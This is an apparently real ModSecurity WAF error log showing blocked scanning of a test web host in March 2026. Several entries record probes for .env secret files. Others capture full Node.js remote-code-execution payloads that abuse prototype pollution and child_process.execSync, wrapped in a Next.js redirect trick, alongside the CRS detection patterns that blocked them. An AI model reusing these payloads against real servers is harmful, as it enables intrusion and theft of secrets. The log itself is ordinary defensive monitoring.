[Sat Mar 21 04:10:57.426521 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/service/.env.staging"] [unique_id "ab4MQScEfGZAHyIZnYBwSwAAAAQ"]
[Sat Mar 21 04:10:57.721443 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.production"] [unique_id "ab4MQScEfGZAHyIZnYBwTAAAAAQ"]
[Sat Mar 21 04:10:57.721595 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.production"] [unique_id "ab4MQScEfGZAHyIZnYBwTAAAAAQ"]
[Sat Mar 21 04:10:57.721744 2026] [:error] [pid 2836927] [client 13.54.173.38:57880] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.production"] [unique_id "ab4MQScEfGZAHyIZnYBwTAAAAAQ"]
[Sun Mar 22 09:31:15.693630 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasRwAAAAY"]
[Sun Mar 22 09:31:15.694085 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasRwAAAAY"]
[Sun Mar 22 09:31:15.694948 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasRwAAAAY"]
[Sun Mar 22 09:31:15.695092 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasRwAAAAY"]
[Sun Mar 22 09:31:15.813782 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasSAAAAAY"]
[Sun Mar 22 09:31:15.814272 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasSAAAAAY"]
[Sun Mar 22 09:31:15.815297 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasSAAAAAY"]
[Sun Mar 22 09:31:15.815437 2026] [:error] [pid 2863257] [client 52.66.201.32:55432] [client 52.66.201.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "ab-o04v4EeDHRuTSuoasSAAAAAY"]
[Tue Mar 24 19:44:42.406706 2026] [:error] [pid 2907971] [client 216.73.216.189:8336] [client 216.73.216.189] ModSecurity: Warning. Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "628"] [id "920330"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EMPTY_HEADER_UA"] [hostname "surf.test.indacotrentino.com"] [uri "/robots.txt"] [unique_id "acLbmhM6I1CDme2POhnVNwAAAAg"]
[Wed Mar 25 20:14:47.326209 2026] [:error] [pid 2927217] [client 204.76.203.25:42988] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "acQ0J3wBgMvVNnqsSnVnUgAAABA"]
[Wed Mar 25 20:14:47.327326 2026] [:error] [pid 2927217] [client 204.76.203.25:42988] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "acQ0J3wBgMvVNnqsSnVnUgAAABA"]
[Wed Mar 25 20:14:47.327462 2026] [:error] [pid 2927217] [client 204.76.203.25:42988] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "acQ0J3wBgMvVNnqsSnVnUgAAABA"]
[Thu Mar 26 17:18:43.672073 2026] [:error] [pid 3337397] [client 85.11.167.19:36616] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1774541923_3502',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "acVcY5GQddNs3Pwl8JzpwQAAAAY"], referer: https://surf.test.indacotrentino.com
[Thu Mar 26 17:18:43.672901 2026] [:error] [pid 3337397] [client 85.11.167.19:36616] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1774541923_3502',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "acVcY5GQddNs3Pwl8JzpwQAAAAY"], referer: https://su[Sat Mar 28 00:03:38.989356 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMyt4TRi8ERqZAbe2R4AAAAAM"]
[Sat Mar 28 00:03:38.989797 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMyt4TRi8ERqZAbe2R4AAAAAM"]
[Sat Mar 28 00:03:38.990622 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMyt4TRi8ERqZAbe2R4AAAAAM"]
[Sat Mar 28 00:03:38.990764 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMyt4TRi8ERqZAbe2R4AAAAAM"]
[Sat Mar 28 00:03:39.031757 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMy94TRi8ERqZAbe2R4QAAAAM"]
[Sat Mar 28 00:03:39.032254 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMy94TRi8ERqZAbe2R4QAAAAM"]
[Sat Mar 28 00:03:39.033259 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMy94TRi8ERqZAbe2R4QAAAAM"]
[Sat Mar 28 00:03:39.033405 2026] [:error] [pid 88907] [client 34.244.225.48:37586] [client 34.244.225.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "accMy94TRi8ERqZAbe2R4QAAAAM"]